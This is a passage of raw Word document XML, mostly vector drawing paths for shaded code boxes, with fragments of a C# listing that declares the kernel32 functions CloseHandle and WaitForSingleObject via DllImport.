path="m1517,12000l1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12000,1517,12001,1517,12001,1517,12001,1517,12001,1517,12001,1517,12001,1517,12002,1517,12002,1517,12002,1517,12002,1517,12003,1517,12003,1517,12003,1517,12004,1517,12004,1517,12005,1517,12005,1517,12006,1517,12006,1517,12007,1517,12008,1517,12008,1517,12009,1517,12010,1517,12011,1517,12012,1517,12013,1517,12014,1517,12015,1517,12016,1517,12017,1517,12018,1517,12020,1517,12021,1517,12022,1517,12024,1517,12025,1517,12027,1517,12028,1517,12030,1517,12032,1517,12034,1517,12036,1517,12038,1517,12040,1517,12042,1517,12044,1517,12046,1517,12049,1517,12051,1517,12053,1517,12056,1517,12059,1517,12061,1517,12064,1517,12067,1517,12070,1517,12073,1517,12077,1517,12080,1517,12083,1517,12087,1517,12090,1517,12094,1517,12098,1517,12101,1517,12105,1517,12109,1517,12114,1517,12118,1517,12122,1517,12127,1517,12131,1517,12136,1517,12141,1517,12146,1517,12151,1517,12156,1517,12161,1517,12166,1517,12172,1517,12178,1517,12183,1517,12189,1517,12195,1517,12201,1517,12207,1517,12214,1517,12220,1517,12227,1517,12234,1517,12240,1517,12247,1517,12255,1517,12262,1517,12269,1517,12277,1517,12285,1517,12292,1517,12300,1517,12308,1517,12317,1517,12325,1517,12334,1517,12342,1517,12351,1517,12360e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:617.500pt;width:449.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12350" coordsize="8990,330">
        <v:shape style="position:absolute;left:1490;top:12350;width:8990;height:330" coordorigin="1490,12350" coordsize="8990,330" path="m1510,12360l1510,12360,1510,12360,1510,12360,1510,12360,1510,12360,1510,12360,1511,12360,1512,12360,1512,12360,1514,12360,1515,12360,1517,12360,1519,12360,1521,12360,1524,12360,1528,12360,1532,12360,1536,12360,1541,12360,1546,12360,1552,12360,1559,12360,1566,12360,1575,12360,1583,12360,1593,12360,1603,12360,1615,12360,1627,12360,1640,12360,1654,12360,1668,12360,1684,12360,1701,12360,1719,12360,1738,12360,1758,12360,1780,12360,1802,12360,1826,12360,1851,12360,1877,12360,1904,12360,1933,12360,1963,12360,1995,12360,2028,12360,2063,12360,2099,12360,2136,12360,2175,12360,2216,12360,2259,12360,2303,12360,2348,12360,2396,12360,2445,12360,2496,12360,2549,12360,2604,12360,2660,12360,2719,12360,2779,12360,2841,12360,2906,12360,2972,12360,3041,12360,3112,12360,3184,12360,3259,12360,3336,12360,3416,12360,3498,12360,3582,12360,3668,12360,3757,12360,3848,12360,3941,12360,4037,12360,4136,12360,4236,12360,4340,12360,4446,12360,4555,12360,4666,12360,4780,12360,4897,12360,5017,12360,5139,12360,5264,12360,5392,12360,5523,12360,5657,12360,5793,12360,5933,12360,6076,12360,6222,12360,6370,12360,6522,12360,6677,12360,6835,12360,6997,12360,7161,12360,7329,12360,7500,12360,7675,12360,7853,12360,8034,12360,8219,12360,8407,12360,8598,12360,8793,12360,8992,12360,9194,12360,9400,12360,9609,12360,9823,12360,10039,12360,10260,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12360,10484,12361,10484,12361,10484,12361,10484,12361,10484,12361,10484,12361,10484,12361,10484,12362,10484,12362,10484,12362,10484,12362,10484,12363,10484,12363,10484,12363,10484,12364,10484,12364,10484,12365,10484,12365,10484,12366,10484,12366,10484,12367,10484,12367,10484,12368,10484,12369,10484,12369,10484,12370,10484,12371,10484,12372,10484,12373,10484,12374,10484,12375,10484,12376,10484,12377,10484,12378,10484,12379,10484,12381,10484,12382,10484,12383,10484,12385,10484,12386,10484,12388,10484,12389,10484,12391,10484,12393,10484,12395,10484,12397,10484,12398,10484,12400,10484,12403,10484,12405,10484,12407,10484,12409,10484,12412,10484,12414,10484,12417,10484,12419,10484,12422,10484,12425,10484,12427,10484,12430,10484,12433,10484,12436,10484,12440,10484,12443,10484,12446,10484,12450,10484,12453,10484,12457,10484,12461,10484,12464,10484,12468,10484,12472,10484,12476,10484,12481,10484,12485,10484,12489,10484,12494,10484,12498,10484,12503,10484,12508,10484,12513,10484,12518,10484,12523,10484,12528,10484,12534,10484,12539,10484,12545,10484,12550,10484,12556,10484,12562,10484,12568,10484,12574,10484,12581,10484,12587,10484,12594,10484,12600,10484,12607,10484,12614,10484,12621,10484,12628,10484,12635,10484,12643,10484,12650,10484,12658,10484,12666,10484,12674,10484,12682,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10483,12690,10482,12690,10482,12690,10480,12690,10479,12690,10477,12690,10475,12690,10473,12690,10470,12690,10466,12690,10462,12690,10458,12690,10453,12690,10448,12690,10442,12690,10435,12690,10428,12690,10419,12690,10411,12690,10401,12690,10391,12690,10379,12690,10367,12690,10354,12690,10340,12690,10326,12690,10310,12690,10293,12690,10275,12690,10256,12690,10236,12690,10215,12690,10192,12690,10168,12690,10143,12690,10117,12690,10090,12690,10061,12690,10031,12690,9999,12690,9966,12690,9931,12690,9895,12690,9858,12690,9819,12690,9778,12690,9735,12690,9691,12690,9646,12690,9598,12690,9549,12690,9498,12690,9445,12690,9391,12690,9334,12690,9275,12690,9215,12690,9153,12690,9088,12690,9022,12690,8953,12690,8883,12690,8810,12690,8735,12690,8658,12690,8578,12690,8497,12690,8413,12690,8326,12690,8238,12690,8146,12690,8053,12690,7957,12690,7859,12690,7758,12690,7654,12690,7548,12690,7439,12690,7328,12690,7214,12690,7097,12690,6977,12690,6855,12690,6730,12690,6602,12690,6471,12690,6337,12690,6201,12690,6061,12690,5918,12690,5773,12690,5624,12690,5472,12690,5317,12690,5159,12690,4997,12690,4833,12690,4665,12690,4494,12690,4319,12690,4141,12690,3960,12690,3776,12690,3587,12690,3396,12690,3201,12690,3002,12690,2800,12690,2594,12690,2385,12690,2172,12690,1955,12690,1734,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12689,1510,12689,1510,12689,1510,12689,1510,12689,1510,12688,1510,12688,1510,12688,1510,12687,1510,12687,1510,12687,1510,12686,1510,12686,1510,12685,1510,12685,1510,12684,1510,12683,1510,12683,1510,12682,1510,12681,1510,12680,1510,12680,1510,12679,1510,12678,1510,12677,1510,12676,1510,12675,1510,12674,1510,12673,1510,12671,1510,12670,1510,12669,1510,12667,1510,12666,1510,12664,1510,12663,1510,12661,1510,12660,1510,12658,1510,12656,1510,12654,1510,12652,1510,12650,1510,12648,1510,12646,1510,12644,1510,12641,1510,12639,1510,12637,1510,12634,1510,12631,1510,12629,1510,12626,1510,12623,1510,12620,1510,12617,1510,12614,1510,12611,1510,12608,1510,12604,1510,12601,1510,12597,1510,12594,1510,12590,1510,12586,1510,12582,1510,12578,1510,12574,1510,12570,1510,12566,1510,12561,1510,12557,1510,12552,1510,12548,1510,12543,1510,12538,1510,12533,1510,12528,1510,12522,1510,12517,1510,12512,1510,12506,1510,12500,1510,12494,1510,12489,1510,12482,1510,12476,1510,12470,1510,12464,1510,12457,1510,12450,1510,12444,1510,12437,1510,12430,1510,12422,1510,12415,1510,12408,1510,12400,1510,12392,1510,12385,1510,12377,1510,12368,1510,12360e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:617.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12350" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:12350;width:30;height:330" coordorigin="1490,12350" coordsize="30,330" path="m1517,12360l1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12360,1517,12361,1517,12361,1517,12361,1517,12361,1517,12361,1517,12361,1517,12361,1517,12362,1517,12362,1517,12362,1517,12362,1517,12363,1517,12363,1517,12363,1517,12364,1517,12364,1517,12365,1517,12365,1517,12366,1517,12366,1517,12367,1517,12367,1517,12368,1517,12369,1517,12369,1517,12370,1517,12371,1517,12372,1517,12373,1517,12374,1517,12375,1517,12376,1517,12377,1517,12378,1517,12379,1517,12381,1517,12382,1517,12383,1517,12385,1517,12386,1517,12388,1517,12389,1517,12391,1517,12393,1517,12395,1517,12397,1517,12398,1517,12400,1517,12403,1517,12405,1517,12407,1517,12409,1517,12412,1517,12414,1517,12417,1517,12419,1517,12422,1517,12425,1517,12427,1517,12430,1517,12433,1517,12436,1517,12440,1517,12443,1517,12446,1517,12450,1517,12453,1517,12457,1517,12461,1517,12464,1517,12468,1517,12472,1517,12476,1517,12481,1517,12485,1517,12489,1517,12494,1517,12498,1517,12503,1517,12508,1517,12513,1517,12518,1517,12523,1517,12528,1517,12534,1517,12539,1517,12545,1517,12550,1517,12556,1517,12562,1517,12568,1517,12574,1517,12581,1517,12587,1517,12594,1517,12600,1517,12607,1517,12614,1517,12621,1517,12628,1517,12635,1517,12643,1517,12650,1517,12658,1517,12666,1517,12674,1517,12682,1517,12690e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:633.500pt;width:449.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12670" coordsize="8990,330">
        <v:shape style="position:absolute;left:1490;top:12670;width:8990;height:330" coordorigin="1490,12670" coordsize="8990,330" path="m1510,12690l1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1510,12690,1511,12690,1512,12690,1512,12690,1514,12690,1515,12690,1517,12690,1519,12690,1521,12690,1524,12690,1528,12690,1532,12690,1536,12690,1541,12690,1546,12690,1552,12690,1559,12690,1566,12690,1575,12690,1583,12690,1593,12690,1603,12690,1615,12690,1627,12690,1640,12690,1654,12690,1668,12690,1684,12690,1701,12690,1719,12690,1738,12690,1758,12690,1780,12690,1802,12690,1826,12690,1851,12690,1877,12690,1904,12690,1933,12690,1963,12690,1995,12690,2028,12690,2063,12690,2099,12690,2136,12690,2175,12690,2216,12690,2259,12690,2303,12690,2348,12690,2396,12690,2445,12690,2496,12690,2549,12690,2604,12690,2660,12690,2719,12690,2779,12690,2841,12690,2906,12690,2972,12690,3041,12690,3112,12690,3184,12690,3259,12690,3336,12690,3416,12690,3498,12690,3582,12690,3668,12690,3757,12690,3848,12690,3941,12690,4037,12690,4136,12690,4236,12690,4340,12690,4446,12690,4555,12690,4666,12690,4780,12690,4897,12690,5017,12690,5139,12690,5264,12690,5392,12690,5523,12690,5657,12690,5793,12690,5933,12690,6076,12690,6222,12690,6370,12690,6522,12690,6677,12690,6835,12690,6997,12690,7161,12690,7329,12690,7500,12690,7675,12690,7853,12690,8034,12690,8219,12690,8407,12690,8598,12690,8793,12690,8992,12690,9194,12690,9400,12690,9609,12690,9823,12690,10039,12690,10260,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12690,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12691,10484,12692,10484,12692,10484,12692,10484,12692,10484,12693,10484,12693,10484,12693,10484,12694,10484,12694,10484,12694,10484,12695,10484,12695,10484,12696,10484,12697,10484,12697,10484,12698,10484,12698,10484,12699,10484,12700,10484,12701,10484,12701,10484,12702,10484,12703,10484,12704,10484,12705,10484,12706,10484,12707,10484,12709,10484,12710,10484,12711,10484,12712,10484,12714,10484,12715,10484,12717,10484,12718,10484,12720,10484,12721,10484,12723,10484,12725,10484,12727,10484,12729,10484,12731,10484,12733,10484,12735,10484,12737,10484,12739,10484,12742,10484,12744,10484,12747,10484,12749,10484,12752,10484,12755,10484,12757,10484,12760,10484,12763,10484,12766,10484,12769,10484,12772,10484,12776,10484,12779,10484,12783,10484,12786,10484,12790,10484,12794,10484,12797,10484,12801,10484,12805,10484,12809,10484,12814,10484,12818,10484,12822,10484,12827,10484,12831,10484,12836,10484,12841,10484,12846,10484,12851,10484,12856,10484,12861,10484,12866,10484,12872,10484,12877,10484,12883,10484,12889,10484,12895,10484,12901,10484,12907,10484,12913,10484,12919,10484,12926,10484,12933,10484,12939,10484,12946,10484,12953,10484,12960,10484,12967,10484,12975,10484,12982,10484,12990,10484,12998,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10483,13006,10482,13006,10482,13006,10480,13006,10479,13006,10477,13006,10475,13006,10473,13006,10470,13006,10466,13006,10462,13006,10458,13006,10453,13006,10448,13006,10442,13006,10435,13006,10428,13006,10419,13006,10411,13006,10401,13006,10391,13006,10379,13006,10367,13006,10354,13006,10340,13006,10326,13006,10310,13006,10293,13006,10275,13006,10256,13006,10236,13006,10215,13006,10192,13006,10168,13006,10143,13006,10117,13006,10090,13006,10061,13006,10031,13006,9999,13006,9966,13006,9931,13006,9895,13006,9858,13006,9819,13006,9778,13006,9735,13006,9691,13006,9646,13006,9598,13006,9549,13006,9498,13006,9445,13006,9391,13006,9334,13006,9275,13006,9215,13006,9153,13006,9088,13006,9022,13006,8953,13006,8883,13006,8810,13006,8735,13006,8658,13006,8578,13006,8497,13006,8413,13006,8326,13006,8238,13006,8146,13006,8053,13006,7957,13006,7859,13006,7758,13006,7654,13006,7548,13006,7439,13006,7328,13006,7214,13006,7097,13006,6977,13006,6855,13006,6730,13006,6602,13006,6471,13006,6337,13006,6201,13006,6061,13006,5918,13006,5773,13006,5624,13006,5472,13006,5317,13006,5159,13006,4997,13006,4833,13006,4665,13006,4494,13006,4319,13006,4141,13006,3960,13006,3776,13006,3587,13006,3396,13006,3201,13006,3002,13006,2800,13006,2594,13006,2385,13006,2172,13006,1955,13006,1734,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13005,1510,13004,1510,13004,1510,13004,1510,13004,1510,13004,1510,13003,1510,13003,1510,13003,1510,13002,1510,13002,1510,13001,1510,13001,1510,13000,1510,13000,1510,12999,1510,12999,1510,12998,1510,12998,1510,12997,1510,12996,1510,12995,1510,12994,1510,12994,1510,12993,1510,12992,1510,12991,1510,12990,1510,12989,1510,12987,1510,12986,1510,12985,1510,12984,1510,12982,1510,12981,1510,12979,1510,12978,1510,12976,1510,12974,1510,12973,1510,12971,1510,12969,1510,12967,1510,12965,1510,12963,1510,12961,1510,12959,1510,12957,1510,12954,1510,12952,1510,12949,1510,12947,1510,12944,1510,12941,1510,12939,1510,12936,1510,12933,1510,12930,1510,12927,1510,12923,1510,12920,1510,12917,1510,12913,1510,12910,1510,12906,1510,12902,1510,12899,1510,12895,1510,12891,1510,12887,1510,12882,1510,12878,1510,12874,1510,12869,1510,12865,1510,12860,1510,12855,1510,12850,1510,12845,1510,12840,1510,12835,1510,12830,1510,12824,1510,12819,1510,12813,1510,12807,1510,12801,1510,12795,1510,12789,1510,12783,1510,12776,1510,12770,1510,12763,1510,12757,1510,12750,1510,12743,1510,12736,1510,12728,1510,12721,1510,12714,1510,12706,1510,12698,1510,12690e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:633.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12670" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:12670;width:30;height:330" coordorigin="1490,12670" coordsize="30,330" path="m1517,12690l1517,12690,1517,12690,1517,12690,1517,12690,1517,12690,1517,12690,1517,12690,1517,12690,1517,12690,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12691,1517,12692,1517,12692,1517,12692,1517,12692,1517,12693,1517,12693,1517,12693,1517,12694,1517,12694,1517,12694,1517,12695,1517,12695,1517,12696,1517,12697,1517,12697,1517,12698,1517,12698,1517,12699,1517,12700,1517,12701,1517,12701,1517,12702,1517,12703,1517,12704,1517,12705,1517,12706,1517,12707,1517,12709,1517,12710,1517,12711,1517,12712,1517,12714,1517,12715,1517,12717,1517,12718,1517,12720,1517,12721,1517,12723,1517,12725,1517,12727,1517,12729,1517,12731,1517,12733,1517,12735,1517,12737,1517,12739,1517,12742,1517,12744,1517,12747,1517,12749,1517,12752,1517,12755,1517,12757,1517,12760,1517,12763,1517,12766,1517,12769,1517,12772,1517,12776,1517,12779,1517,12783,1517,12786,1517,12790,1517,12794,1517,12797,1517,12801,1517,12805,1517,12809,1517,12814,1517,12818,1517,12822,1517,12827,1517,12831,1517,12836,1517,12841,1517,12846,1517,12851,1517,12856,1517,12861,1517,12866,1517,12872,1517,12877,1517,12883,1517,12889,1517,12895,1517,12901,1517,12907,1517,12913,1517,12919,1517,12926,1517,12933,1517,12939,1517,12946,1517,12953,1517,12960,1517,12967,1517,12975,1517,12982,1517,12990,1517,12998,1517,13006e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:649.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:12990;width:8990;height:390" coordorigin="1490,12990" coordsize="8990,390" path="m1510,13006l1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1510,13006,1511,13006,1512,13006,1512,13006,1514,13006,1515,13006,1517,13006,1519,13006,1521,13006,1524,13006,1528,13006,1532,13006,1536,13006,1541,13006,1546,13006,1552,13006,1559,13006,1566,13006,1575,13006,1583,13006,1593,13006,1603,13006,1615,13006,1627,13006,1640,13006,1654,13006,1668,13006,1684,13006,1701,13006,1719,13006,1738,13006,1758,13006,1780,13006,1802,13006,1826,13006,1851,13006,1877,13006,1904,13006,1933,13006,1963,13006,1995,13006,2028,13006,2063,13006,2099,13006,2136,13006,2175,13006,2216,13006,2259,13006,2303,13006,2348,13006,2396,13006,2445,13006,2496,13006,2549,13006,2604,13006,2660,13006,2719,13006,2779,13006,2841,13006,2906,13006,2972,13006,3041,13006,3112,13006,3184,13006,3259,13006,3336,13006,3416,13006,3498,13006,3582,13006,3668,13006,3757,13006,3848,13006,3941,13006,4037,13006,4136,13006,4236,13006,4340,13006,4446,13006,4555,13006,4666,13006,4780,13006,4897,13006,5017,13006,5139,13006,5264,13006,5392,13006,5523,13006,5657,13006,5793,13006,5933,13006,6076,13006,6222,13006,6370,13006,6522,13006,6677,13006,6835,13006,6997,13006,7161,13006,7329,13006,7500,13006,7675,13006,7853,13006,8034,13006,8219,13006,8407,13006,8598,13006,8793,13006,8992,13006,9194,13006,9400,13006,9609,13006,9823,13006,10039,13006,10260,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13006,10484,13007,10484,13007,10484,13007,10484,13007,10484,13008,10484,13008,10484,13008,10484,13009,10484,13009,10484,13010,10484,13010,10484,13011,10484,13011,10484,13012,10484,13012,10484,13013,10484,13014,10484,13015,10484,13015,10484,13016,10484,13017,10484,13018,10484,13019,10484,13020,10484,13022,10484,13023,10484,13024,10484,13025,10484,13027,10484,13028,10484,13030,10484,13031,10484,13033,10484,13034,10484,13036,10484,13038,10484,13040,10484,13042,10484,13044,10484,13046,10484,13048,10484,13051,10484,13053,10484,13056,10484,13058,10484,13061,10484,13063,10484,13066,10484,13069,10484,13072,10484,13075,10484,13078,10484,13082,10484,13085,10484,13088,10484,13092,10484,13096,10484,13099,10484,13103,10484,13107,10484,13111,10484,13115,10484,13120,10484,13124,10484,13129,10484,13133,10484,13138,10484,13143,10484,13148,10484,13153,10484,13158,10484,13163,10484,13169,10484,13174,10484,13180,10484,13186,10484,13192,10484,13198,10484,13204,10484,13210,10484,13217,10484,13223,10484,13230,10484,13237,10484,13244,10484,13251,10484,13259,10484,13266,10484,13274,10484,13281,10484,13289,10484,13297,10484,13305,10484,13314,10484,13322,10484,13331,10484,13340,10484,13349,10484,13358,10484,13367,10484,13376,10484,13386,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10483,13396,10482,13396,10482,13396,10480,13396,10479,13396,10477,13396,10475,13396,10473,13396,10470,13396,10466,13396,10462,13396,10458,13396,10453,13396,10448,13396,10442,13396,10435,13396,10428,13396,10419,13396,10411,13396,10401,13396,10391,13396,10379,13396,10367,13396,10354,13396,10340,13396,10326,13396,10310,13396,10293,13396,10275,13396,10256,13396,10236,13396,10215,13396,10192,13396,10168,13396,10143,13396,10117,13396,10090,13396,10061,13396,10031,13396,9999,13396,9966,13396,9931,13396,9895,13396,9858,13396,9819,13396,9778,13396,9735,13396,9691,13396,9646,13396,9598,13396,9549,13396,9498,13396,9445,13396,9391,13396,9334,13396,9275,13396,9215,13396,9153,13396,9088,13396,9022,13396,8953,13396,8883,13396,8810,13396,8735,13396,8658,13396,8578,13396,8497,13396,8413,13396,8326,13396,8238,13396,8146,13396,8053,13396,7957,13396,7859,13396,7758,13396,7654,13396,7548,13396,7439,13396,7328,13396,7214,13396,7097,13396,6977,13396,6855,13396,6730,13396,6602,13396,6471,13396,6337,13396,6201,13396,6061,13396,5918,13396,5773,13396,5624,13396,5472,13396,5317,13396,5159,13396,4997,13396,4833,13396,4665,13396,4494,13396,4319,13396,4141,13396,3960,13396,3776,13396,3587,13396,3396,13396,3201,13396,3002,13396,2800,13396,2594,13396,2385,13396,2172,13396,1955,13396,1734,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13396,1510,13395,1510,13395,1510,13395,1510,13395,1510,13395,1510,13395,1510,13395,1510,13394,1510,13394,1510,13394,1510,13394,1510,13393,1510,13393,1510,13393,1510,13392,1510,13392,1510,13391,1510,13391,1510,13390,1510,13389,1510,13389,1510,13388,1510,13387,1510,13387,1510,13386,1510,13385,1510,13384,1510,13383,1510,13382,1510,13381,1510,13380,1510,13379,1510,13377,1510,13376,1510,13375,1510,13373,1510,13372,1510,13370,1510,13368,1510,13367,1510,13365,1510,13363,1510,13361,1510,13359,1510,13357,1510,13355,1510,13353,1510,13351,1510,13348,1510,13346,1510,13343,1510,13341,1510,13338,1510,13335,1510,13332,1510,13329,1510,13326,1510,13323,1510,13320,1510,13316,1510,13313,1510,13309,1510,13306,1510,13302,1510,13298,1510,13294,1510,13290,1510,13286,1510,13282,1510,13277,1510,13273,1510,13268,1510,13263,1510,13259,1510,13254,1510,13248,1510,13243,1510,13238,1510,13233,1510,13227,1510,13221,1510,13215,1510,13209,1510,13203,1510,13197,1510,13191,1510,13184,1510,13178,1510,13171,1510,13164,1510,13157,1510,13150,1510,13143,1510,13135,1510,13128,1510,13120,1510,13112,1510,13104,1510,13096,1510,13088,1510,13079,1510,13070,1510,13062,1510,13053,1510,13044,1510,13034,1510,13025,1510,13015,1510,13006e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:668.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13370" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:13370;width:8990;height:30" coordorigin="1490,13370" coordsize="8990,30" path="m1510,13388l1510,13388,1510,13388,1510,13388,1510,13388,1510,13388,1510,13388,1511,13388,1512,13388,1512,13388,1514,13388,1515,13388,1517,13388,1519,13388,1521,13388,1524,13388,1528,13388,1532,13388,1536,13388,1541,13388,1546,13388,1552,13388,1559,13388,1566,13388,1575,13388,1583,13388,1593,13388,1603,13388,1615,13388,1627,13388,1640,13388,1654,13388,1668,13388,1684,13388,1701,13388,1719,13388,1738,13388,1758,13388,1780,13388,1802,13388,1826,13388,1851,13388,1877,13388,1904,13388,1933,13388,1963,13388,1995,13388,2028,13388,2063,13388,2099,13388,2136,13388,2175,13388,2216,13388,2259,13388,2303,13388,2348,13388,2396,13388,2445,13388,2496,13388,2549,13388,2604,13388,2660,13388,2719,13388,2779,13388,2841,13388,2906,13388,2972,13388,3041,13388,3112,13388,3184,13388,3259,13388,3336,13388,3416,13388,3498,13388,3582,13388,3668,13388,3757,13388,3848,13388,3941,13388,4037,13388,4136,13388,4236,13388,4340,13388,4446,13388,4555,13388,4666,13388,4780,13388,4897,13388,5017,13388,5139,13388,5264,13388,5392,13388,5523,13388,5657,13388,5793,13388,5933,13388,6076,13388,6222,13388,6370,13388,6522,13388,6677,13388,6835,13388,6997,13388,7161,13388,7329,13388,7500,13388,7675,13388,7853,13388,8034,13388,8219,13388,8407,13388,8598,13388,8793,13388,8992,13388,9194,13388,9400,13388,9609,13388,9823,13388,10039,13388,10260,13388,10484,13388e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:648.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16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113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114</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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115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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="305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116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private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static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extern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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bool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CloseHandle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IntPtr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handle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;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117</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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118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DllImport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(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"kernel32"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="365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119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private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static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extern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UInt32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WaitForSingleObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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121</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21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IntPtr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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hHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,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122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>  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UInt32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dwMilliseconds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123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
